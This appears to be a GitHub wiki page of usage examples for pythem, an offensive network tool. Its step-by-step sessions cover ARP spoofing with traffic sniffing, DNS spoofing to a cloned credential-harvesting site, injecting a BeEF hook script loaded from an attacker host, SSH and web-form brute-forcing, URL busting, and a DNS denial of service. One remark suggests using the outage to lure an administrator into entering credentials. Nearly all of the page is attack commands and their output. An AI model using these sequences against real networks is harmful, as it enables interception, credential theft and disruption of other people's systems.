Skip to content

Examples

Jump to bottom
m4n3dw0lf edited this page Jul 27, 2016 · 37 revisions

#Examples

##ARP spoofing - Man-in-the-middle HTTP

  pythem> set interface
  [+] Enter the interface: wlan0
  pythem> set gateway
  [+] Enter the gateway: 192.168.1.1
  pythem> arpspoof start
  [+] Setting the packet forwarding.
  [+] Iptables redefined.
  [+] ARP spoofing initialized.
  pythem> sniff
  [+] Enter the filter: http

##ARP+DNS spoof - fake page redirect to credential harvester

  • use SET or any other site cloner to clone the site of your choice and host in the apache2
  pythem> set target
  [+] Enter the target(s): 192.168.0.8
  pythem> set interface wlan0
  pythem> set gateway 192.168.0.1
  pythem> arpspoof start
  [+] Setting the packet forwarding.
  [+] Iptables redefined.
  [+] ARP spoofing initialized.
  pythem> dnsspoof start
  [+] Domain to be spoofed: www.google.com
  [+] IP address to be redirected: 192.168.0.6
  [+] DNS spoofing initialized.
  pythem> sniff dns

##Man-in-the-middle inject BeEF hook

  • Start BeEF xss framework and get the hook script url
  pythem> set interface wlan0
  pythem> set target 192.168.1.8
  pythem> set gateway 192.168.1.1
  pythem> arpspoof start
  [*] Iptables redefined
  [*] Setting the packet forwarding.
  [+] ARP spoofing initialized.
  pythem> inject start
  [+] Enter the script source: http://192.168.1.6:3000/hook.js
  [+] Script Injection initialized.
  [+] Injection URL - http://192.168.1.6:80
  [+] Script Injected on:  ('192.168.1.8', 34310)

#SSH Brute-Force attack

  pythem> service ssh start
  pythem> set target 
  [+] Enter the target(s): 127.0.0.1
  pythem> set file wordlist.txt
  pythem> brute-force ssh
  [+] Enter the username to bruteforce: anon123

##Web page formulary brute-force

  • First get the source of the web page formulary and get the id= value of the login and password.
  • Show the redirect results of the attempt so if goes to a different page may have worked.
  pythem> set target http://127.0.0.1/
  pythem> set file
  [+] Enter the path to the file: wordlist.txt
  pythem> brute-force webform
  [+] Brute-Form authentication initialized.

  [+] Enter the input id of the username box: vSIS_ID
  [+] Enter the input id of the password box: vSIS_PASS
  [+] Enter the username to brute-force the formulary: root

##URL content buster

  pythem> set target
  [+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
  pythem> set file 1to100.txt
  pythem> brute-force url
  [+] Content URL bruter initialized.

##Jam DNS of LAN range/IP address

It can be quite useful overthrow the DNS to force the administrator to connect with his credentials to the HTTP server of the router to check what's happening while the sniffer 80 is running kk.

pythem> set interface wlan0
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> dos mitmdrop
[+] Man-in-the-middle packet dropping initialized.
pythem> sniff http
Clone this wiki locally